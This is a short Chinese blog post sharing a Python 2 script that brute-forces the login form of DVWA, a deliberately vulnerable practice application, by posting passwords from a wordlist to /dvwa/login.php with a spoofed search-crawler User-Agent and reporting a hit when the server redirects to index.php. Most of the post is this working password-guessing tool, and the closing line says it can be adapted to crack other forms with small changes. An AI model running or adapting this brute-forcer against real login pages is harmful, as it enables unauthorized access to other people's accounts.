[Python]DVWA表单破解单线程版

最近抽时间学习了一下python，只是技术太差了，python的多线程还是没有研究好。还在深入学习中，花点时间写个小脚本练习一下。。。

对python感兴趣的，请关注此文章。。。

http://www.waitalone.cn/python-video.html

DVWA表单破解单线程版

#!/usr/bin/env python
# -*- coding: gbk -*-
# -*- coding: utf-8 -*-
# Date: 2014/8/26
# Created by 独自等待
# 博客 http://www.waitalone.cn/
# python 表单破解
import sys, time, urllib, httplib

starttime = time.time()


def usage():
    print '+' + '-' * 50 + '+'
    print '\t\tDVWA表单破解单线程版'
    print '\t Blog：http://www.waitalone.cn/'
    print '\t\t Code BY： 独自等待'
    print '\t\t Time：2014-08-26'
    print '+' + '-' * 50 + '+'
    if len(sys.argv) != 4:
        print "用法: dvwacrack.py 待破解的域名 用户名 密码字典"
        print "实例: dvwacrack.py www.waitalone.cn admin pass.txt"
        sys.exit()


def crackDvwa(username='admin', password='password'):
    'DVWA表单破解函数单线程版本,Code BY:独自等待'
    httpClient = None
    try:
        params = urllib.urlencode({'username': username, 'password': password, 'Login': '登陆'})
        headers = {'Content-Type': 'application/x-www-form-urlencoded', 'User-Agent': 'Baiduspider'}
        httpClient = httplib.HTTPConnection(host, 80, timeout=10)
        httpClient.request('POST', '/dvwa/login.php', params, headers)
        response = httpClient.getresponse()
        # print response.status
        # print response.reason
        # print response.read()
        # print response.getheaders()
        # print dir(response.getheaders())
        # print response.getheader('Location')
    except Exception, msg:
        print '搞毛毛虫，网站都不能访问，请检查!', msg
        sys.exit()
    else:
        if response.getheader('Location') == 'index.php':
            print '恭喜大爷，密码破解成功!用户名：%s\t密码：%s\n' % (username, password)
    finally:
        if httpClient:
            httpClient.close()


if __name__ == '__main__':
    usage()
    host = sys.argv[1]
    username = sys.argv[2]
    passdic = sys.argv[3]
    popen = None

    try:
        popen = open(passdic)
    except IOError, msg:
        print '字典读取错误!', msg
        sys.exit()
    else:
        plist = [x.rstrip() for x in popen.readlines()]
        print '字典加载成功，共有字典%d行!\n' % len(plist)
        for password in plist:
            crackDvwa(username, password)
        print '报告大爷，破解完成，小爷睡觉去了，拜拜喽!\n'
    finally:
        if popen:
            popen.close()
    endtime = time.time()
    print '脚本执行时间：', endtime - starttime, '秒'

针对其它表单破解可以参考此脚本改改就能用了。。。。

PHP+CURL多线程实现的代码请参考如下文章：

CURL单线程破解DVWA登陆密码

CURL多线程破解DVWA登陆密码

from www.waitalone.cn.thanks for it.